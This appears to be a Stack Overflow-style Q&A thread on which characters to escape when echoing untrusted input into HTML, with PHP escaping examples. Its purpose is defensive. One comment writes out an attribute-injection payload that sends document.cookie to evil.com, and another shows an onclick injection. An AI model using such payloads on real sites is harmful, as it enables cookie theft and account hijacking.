Which characters are necessary and sufficient to escape when outputting user-generated content? (In other words: which characters should web developers escape when outputting text that came from an untrusted, anonymous source?)
A:
When echoing to a page, you should encode:
- '&' (ampersand) becomes '&amp;'
- '"' (double quote) becomes '&quot;'
- ''' (single quote) becomes '&#039;'
- '<' (less than) becomes '&lt;'
- '>' (greater than) becomes '&gt;'
From PHP's htmlspecialchars() docs.
Note that the context also matters.
You'll also need to take the character set into account.
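A minimal sketch of how this might look in PHP, assuming the page is served as UTF-8 and the text lands in ordinary HTML body or attribute content. The `$input` value is made up for illustration. `ENT_QUOTES` asks `htmlspecialchars()` to encode single quotes as well as double quotes, and the third argument names the character set.

```php
<?php
// Hypothetical untrusted input, for illustration only.
$input = "Tom & \"Jerry\" <b>it's</b>";

// ENT_QUOTES encodes both double and single quotes.
// 'UTF-8' tells PHP which character set the input is in.
$safe = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

echo $safe, "\n";
// prints: Tom &amp; &quot;Jerry&quot; &lt;b&gt;it&#039;s&lt;/b&gt;
```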
alex
2010-06-22 10:41:10
What's the reason and/or need to escape quotes?
ChrisW
2010-06-22 10:42:26
In case the text goes into an <input> tag, where it's placed in the value attribute, enclosed in quotes.
Alexander
2010-06-22 10:43:48
@ChrisW I echo your name here `<input name="name" value="<?php echo $name; ?>">`. Now what if I entered my name as `alex" onfocus="window.location = 'http://www.evil.com/steal.php?cookie=' + encodeURI(document.cookie)`
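To make the difference concrete, here is a rough sketch that builds the same `<input>` twice, once with the raw name and once passed through `htmlspecialchars()`. The variable names `$unsafe` and `$safe` are only for illustration.

```php
<?php
// The attacker-supplied name from the comment above.
$name = 'alex" onfocus="window.location = \'http://www.evil.com/steal.php?cookie=\' + encodeURI(document.cookie)';

// Unescaped: the first double quote closes value="..." and
// onfocus becomes a real attribute of the tag.
$unsafe = '<input name="name" value="' . $name . '">';

// Escaped: both kinds of quotes are encoded, so the whole
// string stays inside the value attribute as plain text.
$safe = '<input name="name" value="' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '">';

echo $unsafe, "\n", $safe, "\n";
```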
alex
2010-06-22 10:44:22
Thanks for your reply.
ChrisW
2010-06-22 10:47:05
I also recommend escaping anything that is not [a-zA-Z0-9]. Browsers will still render it properly, and it does not take much effort to implement.
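One possible way to do that in PHP is to turn every non-alphanumeric character into a numeric character reference. This is only a sketch: `encodeNonAlnum()` is a hypothetical helper name, and it assumes UTF-8 input and that the mbstring extension is available for `mb_ord()`.

```php
<?php
// Hypothetical helper: encode every character outside [a-zA-Z0-9]
// as a decimal numeric character reference, e.g. '=' becomes '&#61;'.
// Assumes UTF-8 input and the mbstring extension.
function encodeNonAlnum(string $text): string
{
    $result = preg_replace_callback(
        '/[^a-zA-Z0-9]/u',
        function (array $m): string {
            return '&#' . mb_ord($m[0], 'UTF-8') . ';';
        },
        $text
    );

    // preg_replace_callback() returns null on error (for example,
    // invalid UTF-8 with the /u modifier); output nothing in that case.
    return $result ?? '';
}

echo encodeNonAlnum('a=b;c'), "\n"; // prints: a&#61;b&#59;c
```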
Pedro Laguna
2010-06-22 11:16:43
@Pedro Laguna - If you mean for accented letters, etc., why not serve it as UTF?
ChrisW
2010-06-22 11:23:36
@ChrisW no, I mean : ; , . / \ + = _ - # ! etc. You never know what the bad guys are going to discover to execute Javascript ;)
Pedro Laguna
2010-06-22 11:30:18
@Pedro You mean you never know how IE can be tricked into executing JavaScript... I mean have you seen how the Samy worm was made? http://namb.la/popular/tech.html
alex
2010-06-22 12:05:04
This answer is not what I wanted nor what I expected, but it is the most insightful one because it made me realize that the question is incomplete. Thank you, @alex
Tom
2010-06-22 12:59:56
@alex yes, I read (and understand) the Samy code and the java\nscript trick. But other tricks can be discovered in other browsers too: http://sla.ckers.org/forum/read.php?24,33938,page=1
Pedro Laguna
2010-06-22 13:28:27
@Pedro I know, I was just having a joke at IE's expense :D
alex
2010-06-22 13:46:05
There are more characters; it all depends on where in the page the input is displayed. For example, if it is displayed inside script tags (<script></script>) or in CSS, you have to worry about other characters. See "Why Can't I Just HTML Entity Encode Untrusted Data?" in the OWASP XSS Prevention Cheat Sheet: http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
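For the `<script>` case, HTML entity encoding is the wrong tool, because character references are not decoded inside script elements. One common approach in PHP, sketched here on the assumption that the value is being emitted as a JavaScript string literal, is `json_encode()` with the `JSON_HEX_*` flags. The `$name` value is made up for illustration.

```php
<?php
// Hypothetical untrusted value that tries to break out of the script block.
$name = '</script><script>alert(1)</script>';

// The JSON_HEX_* flags replace <, >, &, ' and " with \uXXXX escapes,
// so the literal cannot end the surrounding <script> element.
$js = json_encode($name, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);

echo '<script>var name = ' . $js . ';</script>', "\n";
```

The JavaScript engine decodes the `\uXXXX` escapes again, so the script sees the original string as data rather than markup.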
fms
2010-06-22 13:46:22
@Pedro Wow, tested a few of them in my console and they are working with Firefox 3.6.3. Scary stuff... thanks for the link.
alex
2010-06-22 13:48:48
A:
I think that escaping the < > & " ' symbols should be enough for any scenario.
Alexander
2010-06-22 10:42:50
These characters are not enough in some scenarios. Imagine the following code: `<input type="text" value="asdf\" onclick=alert(document.domain); a=\"">` Simply escaping the double quotes does not help you :)
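As far as I can tell, the markup in this comment is what backslash-escaping produces. HTML has no backslash escape, so the quote still ends the attribute. A small sketch comparing `addslashes()` with entity encoding, where `$value` is a hypothetical input chosen to reproduce the example:

```php
<?php
// Hypothetical input chosen to reproduce the markup in the comment.
$value = 'asdf" onclick=alert(document.domain); a="';

// Backslash-escaping: the browser ignores the backslash, the quote
// closes value="..." and onclick becomes a real attribute.
$slashed = '<input type="text" value="' . addslashes($value) . '">';

// Entity encoding: the quote becomes &quot; and stays inside the value.
$encoded = '<input type="text" value="' . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '">';

echo $slashed, "\n", $encoded, "\n";
```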
Pedro Laguna
2010-06-24 13:54:06
A:
Maybe this will help you
http://www.theukwebdesigncompany.com/articles/entity-escape-characters.php
hex
2010-06-22 10:43:06
Thanks, but that is a complete list. I don't want to escape everything, I want to escape as little as possible/needed.
Tom
2010-06-22 12:35:16